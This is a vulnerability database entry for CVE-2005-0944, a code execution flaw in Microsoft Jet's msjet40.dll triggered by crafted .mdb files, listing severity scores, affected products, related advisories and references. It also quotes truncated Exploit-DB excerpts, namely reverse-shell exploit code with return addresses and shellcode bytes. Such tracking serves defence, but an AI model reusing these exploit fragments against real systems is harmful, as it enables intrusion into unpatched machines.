CVE-2005-0944
Published 2005-05-02
CVE-2005-0944: Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute…
Priority P349 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 34.02% (98.2th percentile)
Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | jet | <= 4.0.8618.0 | — |
| microsoft | jet | — | — |
| microsoft | office | — | — |
| microsoft | windows_nt | — | — |
CVSS provenance
nvd · v2.0 · 7.5 · HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 7.5 · HIGH
GHSA
GHSA-22g2-cxxf-8f85: Unknown vulnerability in Microsoft Jet DB engine (msjet40
ghsa_unreviewed·2022-05-01
CVE-2005-0944 [HIGH] GHSA-22g2-cxxf-8f85: Unknown vulnerability in Microsoft Jet DB engine (msjet40
Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file.
GHSA
GHSA-xm5h-r3m3-mqj4: Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-6357 [HIGH] CWE-119 GHSA-xm5h-r3m3-mqj4: Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access
Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access Database (.mdb) file. NOTE: due to the lack of details as of 20071210, it is not clear whether this issue is the same as CVE-2007-6026 or CVE-2005-0944.
GHSA
GHSA-2r22-4xgm-wjg8: Stack-based buffer overflow in Microsoft msjet40
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-6026 [HIGH] CWE-119 GHSA-2r22-4xgm-wjg8: Stack-based buffer overflow in Microsoft msjet40
Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944.
VulnCheck
Microsoft jet Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 7.5
CVE-2007-6026 [HIGH] Microsoft jet Improper Restriction of Operations within the Bounds of a Memory Buffer
Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944.
Affected: Microsoft jet
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-028
No detection rules found.
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
exploitdb·2005-04-22
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)
exploitdb·2005-04-12
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)
---
##################################################################
# #
# See-security Technologies ltd. #
# #
# http://www.see-security.com #
# #
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# coded by Tal zeltzer #
# #
# Based on the exploit written by S.Pearson #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1
ReturnAddress = 0x77F51B93 # Address of "jmp edx" in ntdll.dll
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x31\xc9\x83\xe9\xb7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97"
Shellcode_p1 += "\x25\xaa\xb5\x
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
exploitdb·2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
No writeups or analysis indexed.
http://blogs.securiteam.com/?p=535
http://marc.info/?l=bugtraq&m=111231465920199&w=2
http://www.hexview.com/docs/20050331-1.txt
http://www.kb.cert.org/vuls/id/176380
http://www.securityfocus.com/archive/1/442446/100/100/threaded
http://www.securityfocus.com/archive/1/442610/100/100/threaded
Published: 2005-05-02